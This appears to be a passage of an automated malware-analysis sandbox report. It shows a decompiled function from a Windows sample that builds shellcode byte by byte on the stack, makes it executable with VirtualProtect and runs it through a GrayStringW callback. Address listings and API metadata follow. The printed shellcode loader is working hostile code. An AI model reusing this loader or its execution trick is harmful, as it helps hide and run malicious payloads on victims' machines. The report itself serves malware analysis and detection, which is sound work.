                                                  				char _v587;
                                                  				char _v588;
                                                  				char _v589;
                                                  				char _v590;
                                                  				char _v591;
                                                  				char _v592;
                                                  				char _v593;
                                                  				char _v594;
                                                  				char _v595;
                                                  				char _v596;
                                                  				char _v597;
                                                  				char _v598;
                                                  				char _v599;
                                                  				char _v600;
                                                  				char _v601;
                                                  				char _v602;
                                                  				char _v603;
                                                  				char _v604;
                                                  				char _v605;
                                                  				char _v606;
                                                  				char _v607;
                                                  				char _v608;
                                                  				char _v609;
                                                  				char _v610;
                                                  				char _v611;
                                                  				char _v612;
                                                  				char _v613;
                                                  				char _v614;
                                                  				char _v615;
                                                  				char _v616;
                                                  				char _v617;
                                                  				char _v618;
                                                  				char _v619;
                                                  				char _v620;
                                                  				char _v621;
                                                  				char _v622;
                                                  				char _v623;
                                                  				char _v624;
                                                  				char _v625;
                                                  				char _v626;
                                                  				char _v627;
                                                  				char _v628;
                                                  				char _v629;
                                                  				char _v630;
                                                  				char _v631;
                                                  				char _v632;
                                                  				char _v633;
                                                  				char _v634;
                                                  				char _v635;
                                                  				char _v636;
                                                  				char _v637;
                                                  				char _v638;
                                                  				char _v639;
                                                  				char _v640;
                                                  				char _v641;
                                                  				char _v642;
                                                  				char _v643;
                                                  				char _v644;
                                                  				char _v645;
                                                  				char _v646;
                                                  				char _v647;
                                                  				char _v648;
                                                  				char _v649;
                                                  				char _v650;
                                                  				char _v651;
                                                  				char _v652;
                                                  				char _v653;
                                                  				char _v654;
                                                  				char _v655;
                                                  				char _v656;
                                                  				char _v657;
                                                  				char _v658;
                                                  				char _v659;
                                                  				char _v660;
                                                  				char _v661;
                                                  				char _v662;
                                                  				char _v663;
                                                  				char _v664;
                                                  				char _v665;
                                                  				char _v666;
                                                  				char _v667;
                                                  				char _v668;
                                                  				char _v669;
                                                  				char _v670;
                                                  				char _v671;
                                                  				char _v672;
                                                  				char _v673;
                                                  				char _v674;
                                                  				char _v675;
                                                  				_Unknown_base(*)() _v676;
                                                  				long _v680;
                                                  				intOrPtr _v684;
                                                  				int _v688;
                                                  				WCHAR* _v692;
                                                  				long _v696;
                                                  				char _v712;
                                                  				void* _v1712;
                                                  				intOrPtr* _t739;
                                                  				void* _t745;
                                                  				intOrPtr _t775;
                                                  				void* _t784;
                                                  
                                                  				_v676 = 0xe9;
                                                  				_v675 = 0x90;
                                                  				_v674 = 0;
                                                  				_v673 = 0;
                                                  				_v672 = 0;
                                                  				_v671 = 0x55;
                                                  				_v670 = 0x8b;
                                                  				_v669 = 0xec;
                                                  				_v668 = 0x56;
                                                  				_v667 = 0x8b;
                                                  				_v666 = 0x75;
                                                  				_v665 = 8;
                                                  				_v664 = 0xba;
                                                  				_v663 = 0x37;
                                                  				_v662 = 7;
                                                  				_v661 = 0;
                                                  				_v660 = 0;
                                                  				_v659 = 0x57;
                                                  				_v658 = 0xeb;
                                                  				_v657 = 0xe;
                                                  				_v656 = 0x8b;
                                                  				_v655 = 0xca;
                                                  				_v654 = 0xd1;
                                                  				_v653 = 0xe8;
                                                  				_v652 = 0xc1;
                                                  				_v651 = 0xe1;
                                                  				_v650 = 7;
                                                  				_v649 = 0x46;
                                                  				_v648 = 0xb;
                                                  				_v647 = 0xc8;
                                                  				_v646 = 3;
                                                  				_v645 = 0xcf;
                                                  				_v644 = 3;
                                                  				_v643 = 0xd1;
                                                  				_v642 = 0xf;
                                                  				_v641 = 0xbe;
                                                  				_v640 = 0x3e;
                                                  				_v639 = 0x8b;
                                                  				_v638 = 0xc2;
                                                  				_v637 = 0x85;
                                                  				_v636 = 0xff;
                                                  				_v635 = 0x75;
                                                  				_v634 = 0xe9;
                                                  				_v633 = 0x5f;
                                                  				_v632 = 0x5e;
                                                  				_v631 = 0x5d;
                                                  				_v630 = 0xc3;
                                                  				_v629 = 0x55;
                                                  				_v628 = 0x8b;
                                                  				_v627 = 0xec;
                                                  				_v626 = 0x51;
                                                  				_v625 = 0x51;
                                                  				_v624 = 0x53;
                                                  				_v623 = 0x56;
                                                  				_v622 = 0x57;
                                                  				_v621 = 0x8b;
                                                  				_v620 = 0x7d;
                                                  				_v619 = 8;
                                                  				_v618 = 0x33;
                                                  				_v617 = 0xf6;
                                                  				_v616 = 0x8b;
                                                  				_v615 = 0x47;
                                                  				_v614 = 0x3c;
                                                  				_v613 = 0x8b;
                                                  				_v612 = 0x44;
                                                  				_v611 = 0x38;
                                                  				_v610 = 0x78;
                                                  				_v609 = 3;
                                                  				_v608 = 0xc7;
                                                  				_v607 = 0x8b;
                                                  				_v606 = 0x50;
                                                  				_v605 = 0x20;
                                                  				_v604 = 0x8b;
                                                  				_v603 = 0x58;
                                                  				_v602 = 0x1c;
                                                  				_v601 = 3;
                                                  				_v600 = 0xd7;
                                                  				_v599 = 0x8b;
                                                  				_v598 = 0x48;
                                                  				_v597 = 0x24;
                                                  				_v596 = 3;
                                                  				_v595 = 0xdf;
                                                  				_v594 = 0x8b;
                                                  				_v593 = 0x40;
                                                  				_v592 = 0x18;
                                                  				_v591 = 3;
                                                  				_v590 = 0xcf;
                                                  				_v589 = 0x89;
                                                  				_v588 = 0x55;
                                                  				_v587 = 0xfc;
                                                  				_v586 = 0x89;
                                                  				_v585 = 0x4d;
                                                  				_v584 = 0xf8;
                                                  				_v583 = 0x89;
                                                  				_v582 = 0x45;
                                                  				_v581 = 8;
                                                  				_v580 = 0x85;
                                                  				_v579 = 0xc0;
                                                  				_v578 = 0x74;
                                                  				_v577 = 0x1a;
                                                  				_v576 = 0x8b;
                                                  				_v575 = 4;
                                                  				_v574 = 0xb2;
                                                  				_v573 = 3;
                                                  				_v572 = 0xc7;
                                                  				_v571 = 0x50;
                                                  				_v570 = 0xe8;
                                                  				_v569 = 0x96;
                                                  				_v568 = 0xff;
                                                  				_v567 = 0xff;
                                                  				_v566 = 0xff;
                                                  				_v565 = 0x59;
                                                  				_v564 = 0x3b;
                                                  				_v563 = 0x45;
                                                  				_v562 = 0xc;
                                                  				_v561 = 0x74;
                                                  				_v560 = 0x12;
                                                  				_v559 = 0x8b;
                                                  				_v558 = 0x55;
                                                  				_v557 = 0xfc;
                                                  				_v556 = 0x46;
                                                  				_v555 = 0x3b;
                                                  				_v554 = 0x75;
                                                  				_v553 = 8;
                                                  				_v552 = 0x72;
                                                  				_v551 = 0xe6;
                                                  				_v550 = 0x33;
                                                  				_v549 = 0xc0;
                                                  				_v548 = 0x5f;
                                                  				_v547 = 0x5e;
                                                  				_v546 = 0x5b;
                                                  				_v545 = 0x8b;
                                                  				_v544 = 0xe5;
                                                  				_v543 = 0x5d;
                                                  				_v542 = 0xc3;
                                                  				_v541 = 0x8b;
                                                  				_v540 = 0x45;
                                                  				_v539 = 0xf8;
                                                  				_v538 = 0xf;
                                                  				_v537 = 0xb7;
                                                  				_v536 = 4;
                                                  				_v535 = 0x70;
                                                  				_v534 = 0x8b;
                                                  				_v533 = 4;
                                                  				_v532 = 0x83;
                                                  				_v531 = 3;
                                                  				_v530 = 0xc7;
                                                  				_v529 = 0xeb;
                                                  				_v528 = 0xeb;
                                                  				_v527 = 0x55;
                                                  				_v526 = 0x8b;
                                                  				_v525 = 0xec;
                                                  				_v524 = 0x81;
                                                  				_v523 = 0xec;
                                                  				_v522 = 0x24;
                                                  				_v521 = 4;
                                                  				_v520 = 0;
                                                  				_v519 = 0;
                                                  				_v518 = 0x53;
                                                  				_v517 = 0x56;
                                                  				_v516 = 0x57;
                                                  				_v515 = 0x64;
                                                  				_v514 = 0xa1;
                                                  				_v513 = 0x30;
                                                  				_v512 = 0;
                                                  				_v511 = 0;
                                                  				_v510 = 0;
                                                  				_v509 = 0x8b;
                                                  				_v508 = 0x40;
                                                  				_v507 = 0xc;
                                                  				_v506 = 0x8b;
                                                  				_v505 = 0x40;
                                                  				_v504 = 0xc;
                                                  				_v503 = 0x8b;
                                                  				_v502 = 0;
                                                  				_v501 = 0x8b;
                                                  				_v500 = 0;
                                                  				_v499 = 0x8b;
                                                  				_v498 = 0x40;
                                                  				_v497 = 0x18;
                                                  				_v496 = 0x8b;
                                                  				_v495 = 0xf0;
                                                  				_v494 = 0x33;
                                                  				_v493 = 0xdb;
                                                  				_v492 = 0x68;
                                                  				_v491 = 0xe5;
                                                  				_v490 = 0xf0;
                                                  				_v489 = 0x6b;
                                                  				_v488 = 0xf9;
                                                  				_v487 = 0x56;
                                                  				_v486 = 0x89;
                                                  				_v485 = 0x5d;
                                                  				_v484 = 0xec;
                                                  				_v483 = 0xe8;
                                                  				_v482 = 0x69;
                                                  				_v481 = 0xff;
                                                  				_v480 = 0xff;
                                                  				_v479 = 0xff;
                                                  				_v478 = 0x68;
                                                  				_v477 = 0xba;
                                                  				_v476 = 0x23;
                                                  				_v475 = 0xa4;
                                                  				_v474 = 0x72;
                                                  				_v473 = 0x56;
                                                  				_v472 = 0x8b;
                                                  				_v471 = 0xf8;
                                                  				_v470 = 0xe8;
                                                  				_v469 = 0x5c;
                                                  				_v468 = 0xff;
                                                  				_v467 = 0xff;
                                                  				_v466 = 0xff;
                                                  				_v465 = 0x68;
                                                  				_v464 = 0xe9;
                                                  				_v463 = 0xfe;
                                                  				_v462 = 0xab;
                                                  				_v461 = 0x57;
                                                  				_v460 = 0x56;
                                                  				_v459 = 0x89;
                                                  				_v458 = 0x45;
                                                  				_v457 = 0xf8;
                                                  				_v456 = 0xe8;
                                                  				_v455 = 0x4e;
                                                  				_v454 = 0xff;
                                                  				_v453 = 0xff;
                                                  				_v452 = 0xff;
                                                  				_v451 = 0x68;
                                                  				_v450 = 0xe5;
                                                  				_v449 = 0xf9;
                                                  				_v448 = 0x2d;
                                                  				_v447 = 0xff;
                                                  				_v446 = 0x56;
                                                  				_v445 = 0x89;
                                                  				_v444 = 0x45;
                                                  				_v443 = 0xfc;
                                                  				_v442 = 0xe8;
                                                  				_v441 = 0x40;
                                                  				_v440 = 0xff;
                                                  				_v439 = 0xff;
                                                  				_v438 = 0xff;
                                                  				_v437 = 0x68;
                                                  				_v436 = 0x30;
                                                  				_v435 = 0x8d;
                                                  				_v434 = 0x79;
                                                  				_v433 = 0x61;
                                                  				_v432 = 0x56;
                                                  				_v431 = 0x89;
                                                  				_v430 = 0x45;
                                                  				_v429 = 0xf4;
                                                  				_v428 = 0xe8;
                                                  				_v427 = 0x32;
                                                  				_v426 = 0xff;
                                                  				_v425 = 0xff;
                                                  				_v424 = 0xff;
                                                  				_v423 = 0x83;
                                                  				_v422 = 0xc4;
                                                  				_v421 = 0x28;
                                                  				_v420 = 0x89;
                                                  				_v419 = 0x45;
                                                  				_v418 = 0xf0;
                                                  				_v417 = 0x8d;
                                                  				_v416 = 0x85;
                                                  				_v415 = 0xdc;
                                                  				_v414 = 0xfb;
                                                  				_v413 = 0xff;
                                                  				_v412 = 0xff;
                                                  				_v411 = 0x68;
                                                  				_v410 = 3;
                                                  				_v409 = 1;
                                                  				_v408 = 0;
                                                  				_v407 = 0;
                                                  				_v406 = 0x50;
                                                  				_v405 = 0x53;
                                                  				_v404 = 0xff;
                                                  				_v403 = 0xd7;
                                                  				_v402 = 0x85;
                                                  				_v401 = 0xc0;
                                                  				_v400 = 0xf;
                                                  				_v399 = 0x84;
                                                  				_v398 = 0x44;
                                                  				_v397 = 1;
                                                  				_v396 = 0;
                                                  				_v395 = 0;
                                                  				_v394 = 0x53;
                                                  				_v393 = 0x68;
                                                  				_v392 = 0x80;
                                                  				_v391 = 0;
                                                  				_v390 = 0;
                                                  				_v389 = 0;
                                                  				_v388 = 0x6a;
                                                  				_v387 = 3;
                                                  				_v386 = 0x53;
                                                  				_v385 = 0x6a;
                                                  				_v384 = 7;
                                                  				_v383 = 0x68;
                                                  				_v382 = 0;
                                                  				_v381 = 0;
                                                  				_v380 = 0;
                                                  				_v379 = 0x80;
                                                  				_v378 = 0x8d;
                                                  				_v377 = 0x85;
                                                  				_v376 = 0xdc;
                                                  				_v375 = 0xfb;
                                                  				_v374 = 0xff;
                                                  				_v373 = 0xff;
                                                  				_v372 = 0x50;
                                                  				_v371 = 0xff;
                                                  				_v370 = 0x55;
                                                  				_v369 = 0xfc;
                                                  				_v368 = 0x89;
                                                  				_v367 = 0x45;
                                                  				_v366 = 0xfc;
                                                  				_v365 = 0x83;
                                                  				_v364 = 0xf8;
                                                  				_v363 = 0xff;
                                                  				_v362 = 0xf;
                                                  				_v361 = 0x84;
                                                  				_v360 = 0x1e;
                                                  				_v359 = 1;
                                                  				_v358 = 0;
                                                  				_v357 = 0;
                                                  				_v356 = 0x53;
                                                  				_v355 = 0x50;
                                                  				_v354 = 0xff;
                                                  				_v353 = 0x55;
                                                  				_v352 = 0xf4;
                                                  				_v351 = 0x8b;
                                                  				_v350 = 0xf8;
                                                  				_v349 = 0x83;
                                                  				_v348 = 0xff;
                                                  				_v347 = 0xff;
                                                  				_v346 = 0xf;
                                                  				_v345 = 0x84;
                                                  				_v344 = 0xe;
                                                  				_v343 = 1;
                                                  				_v342 = 0;
                                                  				_v341 = 0;
                                                  				_v340 = 0x6a;
                                                  				_v339 = 4;
                                                  				_v338 = 0x68;
                                                  				_v337 = 0;
                                                  				_v336 = 0x30;
                                                  				_v335 = 0;
                                                  				_v334 = 0;
                                                  				_v333 = 0x57;
                                                  				_v332 = 0x53;
                                                  				_v331 = 0xff;
                                                  				_v330 = 0x55;
                                                  				_v329 = 0xf8;
                                                  				_v328 = 0x8b;
                                                  				_v327 = 0xf0;
                                                  				_v326 = 0x85;
                                                  				_v325 = 0xf6;
                                                  				_v324 = 0xf;
                                                  				_v323 = 0x84;
                                                  				_v322 = 0xf8;
                                                  				_v321 = 0;
                                                  				_v320 = 0;
                                                  				_v319 = 0;
                                                  				_v318 = 0x53;
                                                  				_v317 = 0x8d;
                                                  				_v316 = 0x45;
                                                  				_v315 = 0xec;
                                                  				_v314 = 0x50;
                                                  				_v313 = 0x57;
                                                  				_v312 = 0x56;
                                                  				_v311 = 0xff;
                                                  				_v310 = 0x75;
                                                  				_v309 = 0xfc;
                                                  				_v308 = 0xff;
                                                  				_v307 = 0x55;
                                                  				_v306 = 0xf0;
                                                  				_v305 = 0x85;
                                                  				_v304 = 0xc0;
                                                  				_v303 = 0xf;
                                                  				_v302 = 0x84;
                                                  				_v301 = 0xe3;
                                                  				_v300 = 0;
                                                  				_v299 = 0;
                                                  				_v298 = 0;
                                                  				_v297 = 0x8b;
                                                  				_v296 = 0x46;
                                                  				_v295 = 0x3c;
                                                  				_v294 = 3;
                                                  				_v293 = 0xc6;
                                                  				_v292 = 0xf;
                                                  				_v291 = 0xb7;
                                                  				_v290 = 0x48;
                                                  				_v289 = 6;
                                                  				_v288 = 0x8b;
                                                  				_v287 = 0x50;
                                                  				_v286 = 0x54;
                                                  				_v285 = 0x89;
                                                  				_v284 = 0x55;
                                                  				_v283 = 0xfc;
                                                  				_v282 = 0x85;
                                                  				_v281 = 0xc9;
                                                  				_v280 = 0x74;
                                                  				_v279 = 0x19;
                                                  				_v278 = 0xf;
                                                  				_v277 = 0xb7;
                                                  				_v276 = 0x50;
                                                  				_v275 = 0x14;
                                                  				_v274 = 0x83;
                                                  				_v273 = 0xc2;
                                                  				_v272 = 0x28;
                                                  				_v271 = 3;
                                                  				_v270 = 0xc2;
                                                  				_v269 = 0x8b;
                                                  				_v268 = 0x55;
                                                  				_v267 = 0xfc;
                                                  				_v266 = 3;
                                                  				_v265 = 0x10;
                                                  				_v264 = 0x8d;
                                                  				_v263 = 0x40;
                                                  				_v262 = 0x28;
                                                  				_v261 = 0x83;
                                                  				_v260 = 0xe9;
                                                  				_v259 = 1;
                                                  				_v258 = 0x75;
                                                  				_v257 = 0xf6;
                                                  				_v256 = 0x89;
                                                  				_v255 = 0x55;
                                                  				_v254 = 0xfc;
                                                  				_v253 = 0x6a;
                                                  				_v252 = 0x40;
                                                  				_v251 = 0xb8;
                                                  				_v250 = 0x7e;
                                                  				_v249 = 0x13;
                                                  				_v248 = 0;
                                                  				_v247 = 0;
                                                  				_v246 = 0x2b;
                                                  				_v245 = 0xfa;
                                                  				_v244 = 0x68;
                                                  				_v243 = 0;
                                                  				_v242 = 0x30;
                                                  				_v241 = 0;
                                                  				_v240 = 0;
                                                  				_v239 = 0x50;
                                                  				_v238 = 0x53;
                                                  				_v237 = 0x2b;
                                                  				_v236 = 0xf8;
                                                  				_v235 = 0xff;
                                                  				_v234 = 0x55;
                                                  				_v233 = 0xf8;
                                                  				_v232 = 3;
                                                  				_v231 = 0x75;
                                                  				_v230 = 0xfc;
                                                  				_v229 = 0x68;
                                                  				_v228 = 0x7e;
                                                  				_v227 = 0x13;
                                                  				_v226 = 0;
                                                  				_v225 = 0;
                                                  				_v224 = 0x56;
                                                  				_v223 = 0x50;
                                                  				_v222 = 0x89;
                                                  				_v221 = 0x45;
                                                  				_v220 = 0xf0;
                                                  				_v219 = 0xe8;
                                                  				_v218 = 0x97;
                                                  				_v217 = 0;
                                                  				_v216 = 0;
                                                  				_v215 = 0;
                                                  				_v214 = 0x83;
                                                  				_v213 = 0xc4;
                                                  				_v212 = 0xc;
                                                  				_v211 = 0x6a;
                                                  				_v210 = 0x40;
                                                  				_v209 = 0x68;
                                                  				_v208 = 0;
                                                  				_v207 = 0x30;
                                                  				_v206 = 0;
                                                  				_v205 = 0;
                                                  				_v204 = 0x57;
                                                  				_v203 = 0x53;
                                                  				_v202 = 0xff;
                                                  				_v201 = 0x55;
                                                  				_v200 = 0xf8;
                                                  				_v199 = 0x57;
                                                  				_v198 = 0x8d;
                                                  				_v197 = 0x8e;
                                                  				_v196 = 0x7e;
                                                  				_v195 = 0x13;
                                                  				_v194 = 0;
                                                  				_v193 = 0;
                                                  				_v192 = 0x89;
                                                  				_v191 = 0x45;
                                                  				_v190 = 0xf4;
                                                  				_v189 = 0x51;
                                                  				_v188 = 0x50;
                                                  				_v187 = 0xe8;
                                                  				_v186 = 0x77;
                                                  				_v185 = 0;
                                                  				_v184 = 0;
                                                  				_v183 = 0;
                                                  				_v182 = 0x8b;
                                                  				_v181 = 0x75;
                                                  				_v180 = 0xf0;
                                                  				_v179 = 0x83;
                                                  				_v178 = 0xc4;
                                                  				_v177 = 0xc;
                                                  				_v176 = 0x8a;
                                                  				_v175 = 4;
                                                  				_v174 = 0x33;
                                                  				_v173 = 0xb1;
                                                  				_v172 = 0x7d;
                                                  				_v171 = 0x34;
                                                  				_v170 = 0xf4;
                                                  				_v169 = 0x8a;
                                                  				_v168 = 0xd3;
                                                  				_v167 = 0xc0;
                                                  				_v166 = 0xc8;
                                                  				_v165 = 2;
                                                  				_v164 = 0x2a;
                                                  				_v163 = 0xc3;
                                                  				_v162 = 0x32;
                                                  				_v161 = 0xc3;
                                                  				_v160 = 0x2a;
                                                  				_v159 = 0xc8;
                                                  				_v158 = 0xb0;
                                                  				_v157 = 1;
                                                  				_v156 = 0x32;
                                                  				_v155 = 0xcb;
                                                  				_v154 = 0x2a;
                                                  				_v153 = 0xc3;
                                                  				_v152 = 0xc0;
                                                  				_v151 = 0xc1;
                                                  				_v150 = 2;
                                                  				_v149 = 0xf6;
                                                  				_v148 = 0xd9;
                                                  				_v147 = 0x32;
                                                  				_v146 = 0xcb;
                                                  				_v145 = 0x80;
                                                  				_v144 = 0xe9;
                                                  				_v143 = 0x60;
                                                  				_v142 = 0x32;
                                                  				_v141 = 0xcb;
                                                  				_v140 = 0xc0;
                                                  				_v139 = 0xc1;
                                                  				_v138 = 2;
                                                  				_v137 = 0x2a;
                                                  				_v136 = 0xd1;
                                                  				_v135 = 0x80;
                                                  				_v134 = 0xf2;
                                                  				_v133 = 0xfa;
                                                  				_v132 = 0x2a;
                                                  				_v131 = 0xd3;
                                                  				_v130 = 0xf6;
                                                  				_v129 = 0xd2;
                                                  				_v128 = 0xc0;
                                                  				_v127 = 0xc2;
                                                  				_v126 = 3;
                                                  				_v125 = 2;
                                                  				_v124 = 0xd0;
                                                  				_v123 = 0xb0;
                                                  				_v122 = 0xfa;
                                                  				_v121 = 0xc0;
                                                  				_v120 = 0xc2;
                                                  				_v119 = 3;
                                                  				_v118 = 0x32;
                                                  				_v117 = 0xd3;
                                                  				_v116 = 0xf6;
                                                  				_v115 = 0xda;
                                                  				_v114 = 0x80;
                                                  				_v113 = 0xf2;
                                                  				_v112 = 0x51;
                                                  				_v111 = 0x2a;
                                                  				_v110 = 0xc2;
                                                  				_v109 = 0x2a;
                                                  				_v108 = 0xc3;
                                                  				_v107 = 0x34;
                                                  				_v106 = 0xe4;
                                                  				_v105 = 0x2a;
                                                  				_v104 = 0xc3;
                                                  				_v103 = 0x34;
                                                  				_v102 = 0x8b;
                                                  				_v101 = 4;
                                                  				_v100 = 0x60;
                                                  				_v99 = 0x34;
                                                  				_v98 = 0xa5;
                                                  				_v97 = 2;
                                                  				_v96 = 0xc3;
                                                  				_v95 = 0xc0;
                                                  				_v94 = 0xc0;
                                                  				_v93 = 2;
                                                  				_v92 = 2;
                                                  				_v91 = 0xc3;
                                                  				_v90 = 0xf6;
                                                  				_v89 = 0xd8;
                                                  				_v88 = 0x88;
                                                  				_v87 = 4;
                                                  				_v86 = 0x33;
                                                  				_v85 = 0x43;
                                                  				_v84 = 0x81;
                                                  				_v83 = 0xfb;
                                                  				_v82 = 0x7e;
                                                  				_v81 = 0x13;
                                                  				_v80 = 0;
                                                  				_v79 = 0;
                                                  				_v78 = 0x72;
                                                  				_v77 = 0x9c;
                                                  				_v76 = 0xff;
                                                  				_v75 = 0x75;
                                                  				_v74 = 0xf4;
                                                  				_v73 = 0xff;
                                                  				_v72 = 0xd6;
                                                  				_v71 = 0x59;
                                                  				_v70 = 0x5f;
                                                  				_v69 = 0x5e;
                                                  				_v68 = 0x5b;
                                                  				_v67 = 0x8b;
                                                  				_v66 = 0xe5;
                                                  				_v65 = 0x5d;
                                                  				_v64 = 0xc3;
                                                  				_v63 = 0x55;
                                                  				_v62 = 0x8b;
                                                  				_v61 = 0xec;
                                                  				_v60 = 0x8b;
                                                  				_v59 = 0x55;
                                                  				_v58 = 0x10;
                                                  				_v57 = 0x85;
                                                  				_v56 = 0xd2;
                                                  				_v55 = 0x74;
                                                  				_v54 = 0x15;
                                                  				_v53 = 0x8b;
                                                  				_v52 = 0x4d;
                                                  				_v51 = 8;
                                                  				_v50 = 0x56;
                                                  				_v49 = 0x8b;
                                                  				_v48 = 0x75;
                                                  				_v47 = 0xc;
                                                  				_v46 = 0x2b;
                                                  				_v45 = 0xf1;
                                                  				_v44 = 0x8a;
                                                  				_v43 = 4;
                                                  				_v42 = 0xe;
                                                  				_v41 = 0x88;
                                                  				_v40 = 1;
                                                  				_v39 = 0x41;
                                                  				_v38 = 0x83;
                                                  				_v37 = 0xea;
                                                  				_v36 = 1;
                                                  				_v35 = 0x75;
                                                  				_v34 = 0xf5;
                                                  				_v33 = 0x5e;
                                                  				_v32 = 0x5d;
                                                  				_v31 = 0xc3;
                                                  				_v30 = 0;
                                                  				_v29 = 0;
                                                  				_v28 = 0;
                                                  				_v27 = 0;
                                                  				_v20 = 0;
                                                  				VirtualProtect( &_v676, 0x28a, 0x40,  &_v696); // executed
                                                  				GrayStringW(GetDC(0), 0,  &_v676,  &_v1712, 0, 0, 0, 0, 0); // executed
                                                  				_v16 = CommandLineToArgvW(GetCommandLineW(),  &_v688);
                                                  				if(_v16 != 0) {
                                                  					_v8 = 1;
                                                  					while(_v8 < _v688) {
                                                  						if(( *( *(_v16 + _v8 * 4)) & 0x0000ffff) == 0x2f || ( *( *(_v16 + _v8 * 4)) & 0x0000ffff) == 0x2d) {
                                                  							_t745 = E004015F0( *(_v16 + _v8 * 4));
                                                  							_t784 = _t784 + 4;
                                                  							if(_t745 != 0) {
                                                  								_v8 = _v8 + 1;
                                                  								continue;
                                                  							}
                                                  							return 1;
                                                  						} else {
                                                  							_v20 =  *((intOrPtr*)(_v16 + _v8 * 4));
                                                  							break;
                                                  						}
                                                  					}
                                                  					if(_v20 != 0) {
                                                  						_v680 = GetFullPathNameW(_v20, 0x200, 0x416440,  &_v692);
                                                  						if(_v680 == 0 || _v680 > 0xa) {
                                                  							return 1;
                                                  						} else {
                                                  							_v684 = E00403405(_v692, 0x2e);
                                                  							if(_v684 == 0 || E004011C0(_v684,  &_v712) == 0) {
                                                  								return 1;
                                                  							} else {
                                                  								__imp__CoInitialize(0);
                                                  								if(E00401120( &_v712,  &_v12,  &_v24) != 0) {
                                                  									if(E004013B0(_v12, _v24) != 0) {
                                                  										E00401580(_v20, _v12, _v24);
                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x1c))))(_v12);
                                                  										_t775 =  *0x416648; // 0x0
                                                  										_t739 =  *0x416648; // 0x0
                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_t739 + 8))))(_t775);
                                                  									}
                                                  									 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                  									 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                  									__imp__CoUninitialize();
                                                  									return 0;
                                                  								}
                                                  								__imp__CoUninitialize();
                                                  								return 1;
                                                  							}
                                                  						}
                                                  					}
                                                  					return 1;
                                                  				}
                                                  				return 1;
                                                  			}
                                                  0x004024cc
                                                  0x004024d3
                                                  0x004024da
                                                  0x004024e1
                                                  0x004024e8
                                                  0x004024ef
                                                  0x004024f6
                                                  0x004024fd
                                                  0x00402504
                                                  0x0040250b
                                                  0x00402512
                                                  0x00402519
                                                  0x0040251d
                                                  0x00402521
                                                  0x00402525
                                                  0x00402529
                                                  0x0040252d
                                                  0x00402531
                                                  0x00402535
                                                  0x00402539
                                                  0x0040253d
                                                  0x00402541
                                                  0x00402545
                                                  0x00402549
                                                  0x0040254d
                                                  0x00402551
                                                  0x00402555
                                                  0x00402559
                                                  0x0040255d
                                                  0x00402561
                                                  0x00402565
                                                  0x00402569
                                                  0x0040256d
                                                  0x00402571
                                                  0x00402575
                                                  0x00402579
                                                  0x0040257d
                                                  0x00402581
                                                  0x00402585
                                                  0x00402589
                                                  0x0040258d
                                                  0x00402591
                                                  0x00402595
                                                  0x00402599
                                                  0x0040259d
                                                  0x004025a1
                                                  0x004025a5
                                                  0x004025a9
                                                  0x004025ad
                                                  0x004025b1
                                                  0x004025b5
                                                  0x004025b9
                                                  0x004025bd
                                                  0x004025c1
                                                  0x004025c5
                                                  0x004025c9
                                                  0x004025cd
                                                  0x004025d1
                                                  0x004025d5
                                                  0x004025d9
                                                  0x004025dd
                                                  0x004025e1
                                                  0x004025e5
                                                  0x004025e9
                                                  0x004025ed
                                                  0x004025f1
                                                  0x004025f5
                                                  0x004025f9
                                                  0x004025fd
                                                  0x00402601
                                                  0x00402605
                                                  0x00402609
                                                  0x0040260d
                                                  0x00402611
                                                  0x00402615
                                                  0x00402619
                                                  0x0040261d
                                                  0x00402621
                                                  0x00402625
                                                  0x00402629
                                                  0x0040262d
                                                  0x00402631
                                                  0x00402635
                                                  0x00402639
                                                  0x0040263d
                                                  0x00402641
                                                  0x00402645
                                                  0x00402649
                                                  0x0040264d
                                                  0x00402651
                                                  0x00402655
                                                  0x00402659
                                                  0x0040265d
                                                  0x00402661
                                                  0x00402665
                                                  0x00402669
                                                  0x0040266d
                                                  0x00402671
                                                  0x00402675
                                                  0x00402679
                                                  0x0040267d
                                                  0x00402681
                                                  0x00402685
                                                  0x00402689
                                                  0x0040268d
                                                  0x00402691
                                                  0x00402695
                                                  0x00402699
                                                  0x0040269d
                                                  0x004026a1
                                                  0x004026a5
                                                  0x004026a9
                                                  0x004026ad
                                                  0x004026b1
                                                  0x004026b5
                                                  0x004026b9
                                                  0x004026bd
                                                  0x004026c1
                                                  0x004026dd
                                                  0x00402706
                                                  0x00402720
                                                  0x00402727
                                                  0x00402733
                                                  0x00402745
                                                  0x0040275f
                                                  0x0040277c
                                                  0x00402781
                                                  0x00402786
                                                  0x00402742
                                                  0x00000000
                                                  0x00402742
                                                  0x00000000
                                                  0x00402794
                                                  0x0040279d
                                                  0x00000000
                                                  0x0040279d
                                                  0x0040275f
                                                  0x004027a8
                                                  0x004027cf
                                                  0x004027dc
                                                  0x00000000
                                                  0x004027f1
                                                  0x00402802
                                                  0x0040280f
                                                  0x00000000
                                                  0x00402835
                                                  0x00402837
                                                  0x00402856
                                                  0x00402877
                                                  0x00402885
                                                  0x00402899
                                                  0x0040289b
                                                  0x004028a2
                                                  0x004028ac
                                                  0x004028ac
                                                  0x004028ba
                                                  0x004028c8
                                                  0x004028ca
                                                  0x00000000
                                                  0x004028d0
                                                  0x00402858
                                                  0x00000000
                                                  0x0040285e
                                                  0x0040280f
                                                  0x004027dc
                                                  0x00000000
                                                  0x004027aa
                                                  0x00000000

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(000000E9,0000028A,00000040,?), ref: 004026DD
                                                  • GetDC.USER32(00000000), ref: 004026FF
                                                  • GrayStringW.USER32(00000000), ref: 00402706
                                                  • GetCommandLineW.KERNEL32(?), ref: 00402713
                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 0040271A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CommandLine$ArgvGrayProtectStringVirtual
